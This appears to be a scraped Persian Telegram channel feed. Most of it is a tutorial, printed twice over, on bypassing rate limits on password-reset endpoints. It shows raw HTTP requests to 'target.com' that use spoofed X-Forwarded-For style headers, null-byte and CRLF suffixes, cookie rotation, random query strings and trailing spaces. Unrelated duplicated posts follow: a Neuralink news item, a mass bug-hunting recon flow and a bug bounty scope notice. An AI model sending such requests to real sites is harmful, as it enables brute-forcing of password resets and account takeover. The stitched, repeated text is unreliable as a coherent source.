برای دور زدن rate limit می توان از روش های زیر استفاده کرد:
۱- افزودن header های سفارشی زیر
X-Forwarded-For : 127.0.0.1
X-Forwarded-Host : 127.0.0.1
X-Client-IP : 127.0.0.1
X-Remote-IP : 127.0.0.1
X-Remote-Addr : 127.0.0.1
X-Host : 127.0.0.1
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For : 127.0.0.1
[...]
email=victim@gmail.com
۲- افزودن نال بایت (%00) و یا CLRF(%09, %0d, %0a) به انتهای مقدار پارامتر مورد نظر
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com%00
۳-تغییر IP یا کوکی ها یا user-agent
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
[...]
email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
[...]
email=victim@gmail.com
۴- افزودن مقدار تصادفی به انتهای endpoint
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com
۵- افزودن space به انتهای مقدار پارامتر
مثال:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
{"email":"victim@gmail.com"}
که به صورت زیر استفاده می شود:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
{"email":"victim@gmail.com "}
۱- افزودن header های سفارشی زیر
X-Forwarded-For : 127.0.0.1
X-Forwarded-Host : 127.0.0.1
X-Client-IP : 127.0.0.1
X-Remote-IP : 127.0.0.1
X-Remote-Addr : 127.0.0.1
X-Host : 127.0.0.1
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For : 127.0.0.1
[...]
email=victim@gmail.com
۲- افزودن نال بایت (%00) و یا CLRF(%09, %0d, %0a) به انتهای مقدار پارامتر مورد نظر
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com%00
۳-تغییر IP یا کوکی ها یا user-agent
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
[...]
email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
[...]
email=victim@gmail.com
۴- افزودن مقدار تصادفی به انتهای endpoint
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com
۵- افزودن space به انتهای مقدار پارامتر
مثال:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
{"email":"victim@gmail.com"}
که به صورت زیر استفاده می شود:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
{"email":"victim@gmail.com "}
👌3👍1
This media is not supported in your browser
VIEW IN TELEGRAM
ایلان ماسک: تراشه جدید ما میتونه به افراد نابینا، قدرت بینایی بده.
💡 ایلان ماسک، مدیرعامل Neuralink در رویداد Show and Tell اعلام کرد که با تراشههای این شرکت میتوان به افراد با مشکلات بینایی کمک کرد و حتی بینایی را به افرادی که از ابتدا نابینا بودند هم برگرداند.
دانش و تکنولوژی (معجزه بشر) نابینایان رو بینا خواهد کرد.
نکته: آنها بینایی و ما بینش را با صیانت فراهم خواهیم کرد.
@matitanium
💡 ایلان ماسک، مدیرعامل Neuralink در رویداد Show and Tell اعلام کرد که با تراشههای این شرکت میتوان به افراد با مشکلات بینایی کمک کرد و حتی بینایی را به افرادی که از ابتدا نابینا بودند هم برگرداند.
دانش و تکنولوژی (معجزه بشر) نابینایان رو بینا خواهد کرد.
نکته: آنها بینایی و ما بینش را با صیانت فراهم خواهیم کرد.
@matitanium
Forwarded from Deleted Account
Forwarded from Deleted Account
asset discovery --> find ip(DNSX and etc...) --> cut cdn --> httpx --> check manually -> = easy vulnerablity 😈
یه فلو تویه mass hunting 😉
یه فلو تویه mass hunting 😉
😈1
Forwarded from Deleted Account
👍1
Deleted Account
Hi New Wide company join in bug bounty:D scope: *.tokensvc.com
تازه تازه همین الان اومد